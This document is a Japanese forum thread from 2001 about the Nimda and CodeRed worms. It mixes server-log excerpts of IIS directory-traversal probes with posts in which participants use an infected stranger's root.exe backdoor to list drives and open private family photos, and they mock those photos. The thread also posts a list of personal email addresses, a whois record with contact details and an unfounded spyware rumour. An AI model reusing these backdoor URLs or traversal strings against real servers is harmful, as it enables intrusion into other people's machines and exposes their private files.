
264 :名無しさん@お腹いっぱい。:01/10/05 15:12
勝手になるんだったよな?>IE6<最小構成

265 :263:01/10/05 15:18
Miss
×ISS
○IIS

IE6はOSによってインストールタイプ選択項目が違うみたいだ

266 :254:01/10/05 15:33
うひゃ、今調べてみたっけWIN2000の場合は自動的に最小構成
になってしまうんだね。
変なレスしちゃったみたいだ。スマソ

267 :名無しさん@お腹いっぱい。:01/10/05 15:42
>>266
自動的にIISが入ることもないとは言えんぞ(w

268 :sagesage:01/10/05 16:06
WINMXは無事なんですかぁ
よかった(w

269 :sagesage:01/10/05 16:07
WINMXはだいじょうぶなのか。
よかったよかった。

270 :名無しさん@お腹いっぱい。:01/10/05 16:08
>>268
割れと炉裏はダメだぞ(w

271 :sagesage:01/10/05 16:09
すいません。
厨房全開ですね....

272 :名無しさん@お腹いっぱい。:01/10/05 16:12
そうか、学生さんいらっしゃい、の時間か。

273 :名無しさん@お腹いっぱい:01/10/05 17:07
>今調べてみたっけWIN2000の場合は自動的に最小構成
になってしまうんだね。

なんないよ。Readmeには標準構成でも最大構成でもないとかいてるだけで
最小構成とは書いてない。OutlookExplressが入る時点で最小構成ではなくなる

274 :名無しさん@お腹いっぱい。:01/10/05 17:47
>>250
nimdaとは直接関係ないが

IE(5以降)を起動

「ファイル」-「開く」

http://210.103.173.1/ と入力

「Webフォルダとして開く」にチェック

OKをクリック

(゚∀゚)アヒャヒャ

275 :250:01/10/05 17:51
>>274
深い・・実に深い・・。

276 :およよ:01/10/05 21:22
ニムダにやられないように、IE5.5sp2にアップデートすると、デフォルトページがMSNに変更される。
MSNがウイルス源だってのに、どういうことか?ずっこけました。やっぱ犯人はMicrosoftでは?
TrendMicroもMicroつながりでつるんで一儲け??

277 :DASEEE:01/10/05 21:29
http://3535682771/scripts/root.exe?/c%20dir%20%63%3A%5C

278 :名無しさん@お腹いっぱい。:01/10/05 21:35
>>277
つーか、
ftp://3535682771/

279 :名無しさん@お腹いっぱい。:01/10/05 21:48
ワラタ

http://3535682771/index.html

280 :名無しさん@お腹いっぱい。:01/10/05 21:56
で、ここの管理人はまだ気付いてないわけ?(^^;

281 :名無しさん@お腹いっぱい。:01/10/05 23:03
age

282 :名無しさん@お腹いっぱい。 :01/10/06 00:12
会社でパソやサーバがNimda感染したとき、感染ルートの追及方法って・・

1.IISがやられたならIISのログを見る
2.〜.emlの所有者を見る(マイコンピュータ等を使用する)

でよいのかしら?
ほかに良い手はありますか?

283 :名無しさん@お腹いっぱい。:01/10/06 00:15
タイムスタンプでソート

284 :名無しさん@お腹いっぱい。:01/10/06 00:20
かつての感染サイトだが、なんだこれ・・。

http://61.136.189.106/

285 :名無しさん@お腹いっぱい。:01/10/06 10:11
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 325
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 325
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 367
これって亜種?

286 :名無しさん@お腹いっぱい。:01/10/06 10:58
>>285
んー、間違い探しみたいだがどこが亜種じゃないのと違う?

287 :名無しさん@お腹いっぱい。:01/10/06 13:56
http://3d75adaf.t-net.ne.jp/P8210065.JPG
これ、ヤバくねぇ?
C:のあかねってフォルダにあったjpegをwwwrootにコピーしたんだけど
柱のあたりにデストロイヤーみたいな顔が・・・

288 :名無しさん@お腹いっぱい。:01/10/06 14:40
>>287

それはともかく、 ρ(^-^)なんかいるね
http://3d75adaf.t-net.ne.jp

289 :名無しさん@お腹いっぱい。:01/10/06 15:00
あかねちゃん萌え

290 :名無しさん@お腹いっぱい。:01/10/06 15:00
>>288
そりゃいるさ。
感染してるのわかってたからドライブ覗いてみたんでしょ?

291 :288 :01/10/06 15:18
>>290
ここはのぞき見スレです、ってか(w

292 :名無しさん@お腹いっぱい。:01/10/06 15:22
>>287
つーか、いちいち移さなくてもだな、

http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\あかね\P8210065.JPG

293 :名無しさん@お腹いっぱい。:01/10/06 15:26
>>289
>あかねちゃん萌え

ハイハイ、萌え萌え。
http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\あかね\P8040002.JPG

294 :名無しさん@お腹いっぱい。:01/10/06 15:35
>>292
ナルホド。そうやればいいんだ。
おれはいちいちwwwrootかftprootに移してたよん。

295 :名無しさん@お腹いっぱい。:01/10/06 15:36
>>294

遊び場減らさないように精進してくれたまえ(w

つーか今ここ重いな(ww

296 :名無しさん@お腹いっぱい。:01/10/06 15:52
これってセキュ穴埋まってるってことだよな。

http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c%20ver

297 :名無しさん@お腹いっぱい。:01/10/06 16:02
>>293
おやじ萎えぇ(句

298 :名無しさん@お腹いっぱい。:01/10/06 16:13
ふむ、これは山手線のサハ204−26だな(だからなんだ

http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\あかね\P8200031.JPG

299 :名無しさん@お腹いっぱい。:01/10/06 16:15
>>296
クリーンな環境にパッチあてないと意味はない。

300 :名無しさん@お腹いっぱい。:01/10/06 16:16
みんな、もしかしてあかねフォルダ漁ってる?(w

301 :名無しさん@お腹いっぱい。:01/10/06 16:18
>>299
完全駆除されちゃったら、再感染しないので大事に使わないとな、とφ(.. ) めもめも

302 :名無しさん@お腹いっぱい。:01/10/06 16:19
>>300
漏れはc:\中国写真(w

303 :すぱむスパムSPAM:01/10/06 16:21
From :
opt-in@optinrealbig.com optin2savebig@lists.postmastergeneral.com
To : savebig.30@adds.postmastergeneral.com
Subject : Optin message 3
Date : *****
MIME-Version: 1.0
Received: from [128.121.214.236] by hotmail.com (3.2) with ESMTP id MHotMail*****
Received: (from s0261@localhost)by s0261@pm0.net (8.8.8pmg/8.8.5) id FAA98861for :include:/usr/home/s0261/pmgs/users/optin2savebig/delivery/1002328394.22065/rblk.2170; Sat, 6 Oct 2001 05:00:38 GMT
From optin2savebig@ofr.pm0.net Fri, 05 Oct 2001 22:11:13 -0700
Message-Id: <200110060500.FAA98861@s0261.pm0.net>
X-Info: This service does not permit Unsolicited Commercial Email.
X-Info: To report abuse, contact nospam@postmastergeneral.com
X-PMG-Userid: optin2savebig
X-PMG-Msgid: 1002328394.22065
X-PMG-Recipient: savebig.30@adds.postmastergeneral.com

304 :名無しさん@お腹いっぱい。:01/10/06 16:30
ああ、ネズミなんてどうでもイイからぁ(w

http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\あかね\P8190029.JPG

305 :n:01/10/06 16:37
http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&dir+\
やめれw

306 :名無しさん@お腹いっぱい。:01/10/06 16:40
そうそう、これがあかねちゃんがウチに来た時のアクセスログね。

3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:05 +0900] "GET /scripts/root.exe HTTP/1.0" 401 313
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:06 +0900] "GET /MSADC/root.exe HTTP/1.0" 401 313
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:07 +0900] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 401 313
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:08 +0900] "GET /d/winnt/system32/cmd.exe HTTP/1.0" 401 313
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:08 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:09 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:10 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:11 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:12 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:13 +0900] "GET /sc HTTP/1.0" 401 313
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:14 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 215
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:14 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 215
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:15 +0900] "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 190
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:17 +0900] "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 190
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:18 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
3d75adaf.t-net.ne.jp - - [06/Oct/2001:11:57:19 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215

>>304
ねずみだかフィレットだかしらないけど、かわいいな(w

307 :名無しさん@お腹いっぱい。:01/10/06 16:58
>>306

おさそいがあったのか。じゃあしょうがないな(w

>ねずみだかフィレットだかしらないけど、かわいいな(w

肩のホクロがな(w

308 :名無しさん@お腹いっぱい。:01/10/06 19:23
テレ東もNimdaにやられたのかな。
http://news.2ch.net/test/read.cgi/news/1002358690/

309 :名無しさん@お腹いっぱい。:01/10/06 20:24
>>308

つーか(--;

ftp://shop.tv-tokyo.co.jp/

310 :ん〜ま:01/10/06 21:50
>>309
nimdaなのか?

311 :名無しさん@お腹いっぱい。:01/10/06 21:54
>>309
ちがうだろ。鯖はIISではない。

312 :名無しさん@お腹いっぱい。:01/10/06 21:55
>>311のレス先は>>310に訂正

313 :310:01/10/06 22:00
>>311
だよなあ。
http://uptime.netcraft.com/up/graph/?mode_u=off&mode_w=on&site=shop.tv-tokyo.co.jp&submit=Examine
OSはIRIXでWeb鯖はApacheかな?

314 :名無しさん@お腹いっぱい。:01/10/06 22:45
Server: Rapidsite/Apa-1.3.14 (Unix) FrontPage/4.0.4.3 mod_ssl/2.7.1 OpenSSL/0.9.6
と出ました。
by Proxy伝説

315 :名無しさん@お腹いっぱい。:01/10/06 22:45
nimda の来襲もサーバーによっては、日に100件程度に減っているのもあるようだけど、
うちのapacheサーバーには、まだ日に3000件もきているよ。
ほとんど61.xxx.xxx.xxxからのもの。
国内は、結構対策が進んでいるけど、韓国、台湾などの対策がおくれているのかい?

316 :名無しさん@お腹いっぱい。:01/10/06 23:29
>>315
http://www.security.nl/misc/codered-stats/geodist.gif
台湾、中国特に韓国は元々Codered感染者がケタ違いに多かった。
既に2ヶ月放置しているぐらいだから
残念だけどIPの近いユーザーはアタックも今後減らないと思う。

317 : :01/10/07 02:16
誰か穴ふさぎ回れ!

318 :名無し雅の新:01/10/07 02:21
http://www.hamq.jp/i.cfm?i=bigsunday

319 :名無しさん@お腹いっぱい。:01/10/07 03:22
The firewall has blocked Internet access to your computer (HTTP) from 211.56.219.130 (TCP Port 1133) [TCP Flags: S].
ここにnimda発見!詳細ください。

320 :名無しさん@お腹いっぱい。:01/10/07 15:36
>>319
http://211.56.219.130/scripts/root.exe?/c%20net%20send%20*%20%22Your Machine is infected by CodeRed%22

321 :名無しさん@お腹いっぱい。:01/10/08 22:03
たのむからこの期に及んで感染しないでくれ・・。

感染 コマツ電子金属 アニュアルレポート
http://www.komsil.co.jp/
http://www.komsil.co.jp/office/annual-t.htm

「レイキ」宇宙エネルギーによるハンドヒーリング
http://www.mnet.ne.jp/~satoken/index.htm

322 :>:01/10/09 00:20
ここも
dns1.sunsystems.gr.jp も ニムダくんたとばしてくれる。
webは別のマシンでやられていないようにみえる。

内側のPCで感染しているヤツがあって
dns1のIPははNATかマスカレードで使用されてるんだろうと思ふ

>情報通信(電話・LAN・電気)機器の販売・施工・保守
が事業内容なんだけど、ウイ対策も保守のうちとしてやってくれ

323 :名無しさん@お腹いっぱい。:01/10/09 00:26
>>317
自分でやれ。攻撃鯖は攻撃されたヤツにしかわららんから「誰か穴ふさぎ回」るのは不可能。

324 :名無しさん@お腹いっぱい。:01/10/09 00:29
>>322
表に鯖立ててると厨房君でも分かるからすぐ注意されてなおるのだろうが、Webも立ててないようなヤツからだと、感染自覚もないだろうから駆除の期待は薄いな・・。

325 :>:01/10/09 00:35
9/20 ごろ感染して
今日段階で再開してないサイトあるね。

穴ふさいでも、emlダウンのスクリプト残ったまま再開
したり、(このケース意外に多い)
逆にコンテンツだけ書き戻して再開したり

するよりは、よほどマシか。


http://headlines.yahoo.co.jp/hl?a=20011008-00000001-vgb-sci
セキュリテイで商売しながらこんな醜態さらすとこよりはだいぶマシ

326 :名無しさん@お腹いっぱい。:01/10/09 00:42
>>325

うわ、こりゃカッコワルイな・・。
まだ閉鎖中だし・・。
http://matrix.baltimore.co.jp/

ところで、ここも閉鎖中なんだけど、なんか関係あるのかな?
http://people.site.ne.jp/
改竄情報を提供してるサイト

327 :>321:01/10/09 00:49
http://www.mnet.ne.jp/~satoken/index.htm

って IISじゃないのにね。
コンテンツ作成用の環境が汚染されてて
きずかずにそのまま鯖にUP
ってことか

328 :名無しさん@お腹いっぱい。:01/10/09 00:54
>>326
盛大にやられてますな・・。

https://www.netsecurity.ne.jp/article/1/2976.html

329 :>:01/10/09 01:04
CodeRedとNimdaに感染し
そもそもそれ以前に
アノニftpで書きこみ放題でありながら
見た目原型をたもってる、
現在もいじられた html のまま運用中の
www.miruku.co.jp の固さをみならう必要があるな。。。。

330 :>:01/10/09 01:08
この みるく の事例から
最強の防御策は、
”あけぱなしにして、第三者が自由に書き換え可能にしておくこと”
であることがわかる。

331 :名無しさん@お腹いっぱい。:01/10/09 01:14
>>330

御意。

ハッカー志願者でも、ここまでオープンだと改竄しても楽しくないのだろう。

昔西洋人が古来の日本家屋にはカギがないと驚いたそうだが、それと同じ防犯システムだな(^^;

332 :名無しさん@お腹いっぱい。:01/10/09 01:15
それにしても・・。

IEのようなブラウザでみてくれ。
ftp://shop.tv-tokyo.co.jp/10k.html

333 :名無しさん@お腹いっぱい。:01/10/09 01:17
>>327
粘着ジサクジエン君がウルサイから突っ込まないで(w

334 :名無しさん@お腹いっぱい。:01/10/09 10:11
>>325

こんなふうにされちゃったのね(ミラー)
http://people.site.ne.jp/mirror2/2001.10.08/training.baltimore.co.jp/index.html

>セキュリテイで商売しながらこんな醜態さらすとこよりはだいぶマシ

335 :名無しさん@お腹いっぱい。:01/10/09 10:53
>>334
連続改竄のうち、1件目はこんなだって(ミラー
http://people.site.ne.jp/mirror2/2001.10.07/matrix.baltimore.co.jp/index.html

336 :名無しさん@お腹いっぱい。:01/10/09 10:55
なんかかっこいいぞ

Hey Admin, JShalom got root?

gifアニメもあるし。

337 :名無しさん@お腹いっぱい。:01/10/09 11:41
http://osaka.1000e.net/

ここってなんか変なの。
日本語ページに飛んでもイマイチ理解できない。
全ページ感染してるし。

338 :名無しさん@お腹いっぱい。:01/10/09 11:57
>>337
ftp://osaka.1000e.net/
ほんとだ

339 :名無しさん@お腹いっぱい。:01/10/09 14:49
そんな事より>>1よ、ちょいと聞いてくれよ。スレと全然関係ないんだけどさ。
このまえ、msn行ったんです。msn。
そしたらなんかNindaがめちゃくちゃいっぱいで見れないんです。
で、よく見たらなんかリンクがはってあって、Nindaの配付は終了しました〜、とか書いてあるんです。
もうね、アホかと。馬鹿かと。
お前らな、Ninda如きで毎日見ているmsnにわざわざ来てんじゃねーよ、ボケが。
Nindaだよ、Ninda。
なんかサーバ管理者とかもいるし。全社挙げてmsnか。おめでてーな。
よーし部長のパソコンも感染しちゃったぞ〜、とか言ってるの。もう見てらんない。
お前らな、ウイルスバスターやるからそのパソコン空けろと。
M$ってのはな、もっと殺伐としてるべきなんだよ。
サポートで電話した奴といつ喧嘩が始まってもおかしくない、
刺すか刺されるか、そんな雰囲気がいいんじゃねーか。女子供は、すっこんでろ。
で、昨日、やっと見れたかと思ったら、何か飛ばされて、MSN Explorerをご利用ください、とか書いてあるんです。
そこでまたぶち切れですよ。
あのな、MSN Explorerなんてきょうび流行んねーんだよ。ボケが。
得意げな顔して何が、MSN Explorer、だ。
お前は本当にMSN Explorerを使わせたいのかと問いたい。問い詰めたい。小1時間問い詰めたい。
お前、MSN Explorerって作ってみただけちゃうんかと。
ブラウザ通の俺から言わせてもらえば今、ブラウザ通の間での最新流行はやっぱり、
Mozilla、これだね。
MozillaにMuliZilla。これが通の入れ方。
MuliZillaってのは機能が多めに入ってる。そん代わりバグも少し多め。これ。
で、それにMozilla 用コンテキストメニュー拡張。これ最強。
しかしこれを入れると、どこにバグがあるのか分からないという危険も伴う、諸刃の剣。
素人にはお薦め出来ない。
まあお前らド素人は、Intranet Explorerでも使ってなさいってこった。

340 :名無しさん@お腹いっぱい。:01/10/09 15:21
イマイチ

341 :名無しさん@お腹いっぱい。:01/10/09 16:01
NindaってNanda?

342 :名無しさん@お腹いっぱい。:01/10/09 16:26
そういうネタだったのか( ̄△ ̄;

343 :名無しさん@お腹いっぱい。:01/10/09 16:27
Ninda age

344 :名無しさん@お腹いっぱい。:01/10/09 16:32
>>339
なんか最近よく見るね、この文章。
元々センス無いとは思ってたけど
339はもっとセンスないな。
中卒か?

345 :名無しさん@お腹いっぱい。:01/10/09 17:11
MS-DOSからdel readme.emlじゃダメなの?

346 :晒しage >>339 :01/10/09 17:17
Ninda Ninda 〜♪Ninda Ninda Ninda 〜♪

347 :名無しさん@お腹いっぱい。:01/10/09 17:25
経験は語るってか

348 :名無しさん@お腹いっぱい。:01/10/09 17:28
Nimdaが欲しくてmsn行ったらもう復旧された後だった、と(w

349 :名無しさん@お腹いっぱい。:01/10/09 18:09
>>344
ここの吉野屋も見てみ。
http://isweb33.infoseek.co.jp/play/liloatx/index.html

350 :名無しさん@お腹いっぱい。:01/10/09 18:28
>>349

ワラタ

351 :名無しさん@お腹いっぱい。:01/10/09 19:39
http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+dir+"c:\"

丸見えやん。

352 :名無しさん@お腹いっぱい。:01/10/09 19:47
また、あかねちゃん復活かw

353 :名無しさん@お腹いっぱい。:01/10/09 20:15
意味不明の「ニンダ」よりあかねちゃんのほうがいいよ

http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\あかね\P8150020.JPG

354 :名無しさん@お腹いっぱい。:01/10/09 20:23
萌えました?

355 :353 :01/10/09 20:26
ハイ(..=)

って、そっちより、こっちがいいっす・・。
http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\あかね\P8190029.JPG

いや、ふぇれっとじゃなくて。

356 :名無しさん@お腹いっぱい。:01/10/09 20:29
もっとエロいのないの?
パパ撮ってよハァハァ

357 :名無しさん@お腹いっぱい。:01/10/09 20:31
>>356

>もっとエロいのないの?
>パパ撮ってよハァハァ

あったよ
http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\あかね\P8040002.JPG

358 :名無しさん@お腹いっぱい。:01/10/09 20:34
>>357
既出おやじいやーん

359 :名無しさん@お腹いっぱい。:01/10/09 20:35
>>358

>パパ撮ってよハァハァ

スマソ、パパ萌えなのかと・・・(^^;

360 :名無しさん@お腹いっぱい。:01/10/09 20:38

・・・ほとんどあかねフォルダスレに・・・。

361 :名無しさん@お腹いっぱい。:01/10/09 20:39
まあここもニムダ感染してるし(w

362 :名無しさん@お腹いっぱい。:01/10/09 20:40
もうちょっと美少女だったらセキュ板のアイドルにして
半角板に宣伝にいったのに

363 :名無しさん@お腹いっぱい。:01/10/09 20:44
>>362

http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\あかね\P8190029.JPG

この子、肩にホクロあるでしょ。>>353 とは別の子だとおもうのね。
この子>>355 の全部顔が写ってるのだったらその資格あるとおもうんだけどなぁ。

364 :名無しさん@お腹いっぱい。:01/10/09 21:10
http://vil.nai.com/vil/virusSummary.asp?virus_k=99209
亜種でたみたいねぇ。
README.EXE と README.EML を PUTA!!.SCR と PUTA!!.EML に置き換えて
実行バイナリ圧縮しただけかな?

365 :名無しさん@お腹いっぱい。:01/10/09 22:46


adimage.dll
advert.dll
advpack.dll
amcis.dll
amcis2.dll
amcompat.tlb
amstream.dll
anadsc.ocx
anadscb.ocx
htmdeng.exe
ipcclient.dll
msipcsv.exe
tfde.dll

ある安全保障局系のサイトにアクセスしてから、
不正アクセスが増えたのです。
変に思い調べたら、
こんなファイルを植え付けられました。
スパイウエアらしいのですがウイルスバスターは認識せず、
手動で削除しました。
CIA系のHPは危険みたいです。

366 :名無しさん@お腹いっぱい。:01/10/09 23:12
>>365
つまんない。
ついでにマルチポストやめれ。

367 :名無しさん@お腹いっぱい。:01/10/09 23:17
>>365
だいぶ前に広まったデマ(つーか誤解)だった気がするが…

368 :名無しさん@お腹いっぱい。:01/10/10 21:01
http://www.takara-univ.ac.jp
のサーバーが何時の間にやらServer: Microsoft-IIS/5.0になっていた。
最初から何故出来なかったのだ。

369 :名無しさん@お腹いっぱい。:01/10/11 09:50
>>368

久々の宝塚造形芸術大学 短期大学部情報(w
こばるとCubeは借り物だったのか?(w


だが・・、
IE(5以降)を起動

「ファイル」-「開く」

http://www.takara-univ.ac.jp/と入力

「Webフォルダとして開く」にチェック

OKをクリック

・・・・・。

370 :名無しさん@お腹いっぱい。:01/10/11 18:25
http://www.86star.co.jp/

ftp://www.86star.co.jp/

http://people.site.ne.jp/mirror2/2001.10.07/www.86star.co.jp/index.html

・・・・。

371 :名無しさん@お腹いっぱい。:01/10/11 19:00


372 :名無しさん@お腹いっぱい。:01/10/11 20:04
■流出の恐れがあったMSの顧客データ
http://japan.cnet.com/News/2001/Item/011011-5.html?mn
マイクロソフトの顧客サービス用ウェブサイトが、ブラウザーさえあ
れば誰でも顧客の取引記録をはじめとする機密情報を閲覧できる状態
だった。検索データベースにセキュリティー保護をかけていなかった。

373 :名無しさん@お腹いっぱい。:01/10/11 20:41
マイクロソフトの顧客サービス用ウェブサイトが、ブラウザーさえあ
れば誰でも顧客の取引記録をはじめとする機密情報を閲覧できる状態
だった。検索データベースにセキュリティー保護をかけていなかった。

流出の恐れがあったMSの顧客データ
http://japan.cnet.com/News/2001/Item/011011-5.html?mn

374 :名無しさん@お腹いっぱい。:01/10/11 20:54
なぜ30分以上開けてかぶる。

375 :号外:01/10/12 11:51
NIMDA以上のウイルス

★★東京都で狂牛病発生★★★
http://news.2ch.net/test/read.cgi?bbs=news&key=1002851962

376 :名無しさん@お腹いっぱい。:01/10/12 12:26
sigefumi@cts-net.ne.jp
piko-@jp-t.ne.jp
rukia@hkg.odn.ne.jp
fb4t-fjt@asahi-net.or.jp
tune@yellow.plala.or.jp
blackwidow@anet.ne.jp
zbf46927@boat.zero.ad.jp
ccv21590@hkg.odn.ne.jp
kengo@d9.dion.ne.jp
aokin_doll@anet.ne.jp
siosai@itpmail.itp.ne.jp
natamoky@zb4.so-net.ne.jp
shikata@nyc.odn.ne.jp
mrk3@f4.dion.ne.jp
yasuhumi-i@tokai.or.jp
whxd777@docomo.ne.jp
you1991@muj.biglobe.ne.jp
yoshiteru-s@docomo.ne.jp
ye183@viola.ocn.ne.jp
nyao@pop02.odn.ne.jp
xxxx777xxxx777@docomo.ne.jp
ye183@viola.ocn.ne.jp
matsuda@f-maria.co.jp
yukinon@poppy.ne.jp
cds09690@par.odn.ne.jp
kasugan.@docomo.ne.jp
0507s-0920y@hcc5.bai.ne.jp

hanngakumannse-

377 :名無しさん@お腹いっぱい。:01/10/12 13:39

          ┌┬┬┬┐
    ―――┴┴┴┴┴―――――、
  /.  ̄ ̄ ̄//. ̄ ̄| || ̄ ̄ ̄||| ̄ ||
  /.    ∧// ∧ ∧| ||      |||   ||
 [/____(゚_//[ ].゚Д゚,,) ||___|||   ||
 ||_. *  _|_| ̄ ̄ ∪|.|.       |ヽ. _||
 lO|o―o|O゜.|二二 京|.|都 双岡病院 ||
 | ∈口∋ ̄_l__l⌒l_|_____|_l⌒l_||
   ̄ ̄`ー' ̄   `ー'  `ー'   `ー'
          ∧
/ ̄ ̄ ̄ ̄ ̄ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
| >>1をお迎えに上がりました                                    |
\__  _________________________ _______/
     V        凸\_________/,凸、           ∨     _______
           ノ´⌒`ヽ三三三三三三三i三.ノ´⌒`ヽ、         ―――――――、     ヽヽ
         [二ノ´金`ヽ二]二二二二二二i仁ノ´劵`ヽニフ       /.  ̄ ̄ ̄//. ̄ ̄| ||____ヽヽ
           ,.-┴―┬┴┐鬨鬩鬨鬩鬨鬨鬩鬨          /.    ∧// ∧ ∧| || 京都市  ヽ ヽ
            /ΛΛ // Λ||L匳匳||卅||匳匯||匳||        [/____(゚_//[ ].゚Д゚,,) || 環境局  |  |
        /_(゚д゚_//_゚Д゚,,)| |丗卅丗卅丗卅丗卅丗        ||_    _|_| ̄ ̄ ∪|.|| ̄ ̄ ̄ ̄ ̄|  |
  _,,,.-―''''"_,,,.-―''''"|コ ̄ ∪i  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|       lO|――|O゜.|____|.||.-――――┴―|
 i゙(}[王i王]I()0コ ―― |―――=|――――――――――〕      |_∈口∋ ̄_l__l⌒l | | コ□ニ//l⌒lソ
 |_∈口∋ ̄_l_l⌒l ノ       ノ      ___l⌒l_ソ          `ー' ̄   `ー' ̄ `ー'   `ー
   ̄ ̄`ー' ̄ `ー' ̄ ̄ ̄ ̄  ̄ ̄ ̄ ̄`ー'   `ー'

378 :名無しさん@お腹いっぱい。:01/10/12 14:23
>>377
ハァ?

379 :名無しさん@お腹いっぱい。:01/10/12 14:29
ま、Nimda騒動も一息ついたことだし、潮時かねぇ。

380 :名無しさん@お腹いっぱい。:01/10/12 15:22
>>379
まだいっぱい来るけどな。
ネタ切れなのは確か。

381 : :01/10/13 16:56
MSNのサイトが二ムダに感染して
被害が出たのっていっだったっけ?
9/19?9/18?
午後11時過ぎに見た人が感染したというのは
覚えているんだけど…。

382 :名無しさん@お腹いっぱい。:01/10/13 19:55
http://help.msn.co.jp/notice.htm
18日だよ。

383 :名無しさん@お腹いっぱい。:01/10/13 22:05
間違えて別のスレにも書いちゃったけど

203.116.169.71 で
ニムダが待ってます・・・

アクセスすると、WMPが起動し、ニムダが入ってきました。

オレっちが今朝ここへアクセスしたあと、ウィルススキャンかけたら
インターネット一時ファイルに入ってました。

384 :名無しさん@お腹いっぱい:01/10/13 23:01
対策ページ1
http://www.kagaku.co.jp

385 :名無しさん@お腹いっぱい。:01/10/14 01:52
>>383

こっ、これは・・・(w

386 :名無しさん@お腹いっぱい。:01/10/14 02:36
>>384
んんん?

ftp://www.kagaku.co.jp

387 :名無しさん@お腹いっぱい。:01/10/14 03:52
今、MSNのチャットが開かんがNimda関係ないかな?
asahi.comも...

388 :名無しさん@お腹いっぱい。:01/10/14 06:11
203.116.169.71検索したら
以下の方でした

Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
(whois7.apnic.net)

inetnum: 203.116.169.64 - 203.116.169.95
netname: EDGECON-SG
descr: Edge Consultant
country: SG
admin-c: KC9-AP
tech-c: KE2-AP
notify: ipaddradmin@cyberway.com.sg
mnt-by: MAINT-AS4657-AP
changed: tktan@cyberway.com.sg 19991203
source: APNIC

person: Cheng Kong Chit
address: Cyberway Pte Ltd
address: 82, Genting Lane, News Centre
address: Singapore 349567
country: SG
phone: +65-740-1691
fax-no: +65-841-1653
e-mail: chengkc@cyberway.com.sg
nic-hdl: KC9-AP
mnt-by: MAINT-AS4657
changed: kennyng@cyberway.com.sg 970519
source: APNIC

person: Kenny Ng
address: StarHub Internet Pte Ltd
address: 31 Kaki Bukit Road 3
address: #05-18/20 Techlink Lobby A
address: Singapore 417818
country: SG
phone: +65-8806821
fax-no: +65-8441315
e-mail: domainadmin@starhub.net.sg
nic-hdl: KE2-AP
mnt-by: MAINT-AS4657
changed: domainadmin@starhub.net.sg 20000519
source: APNIC

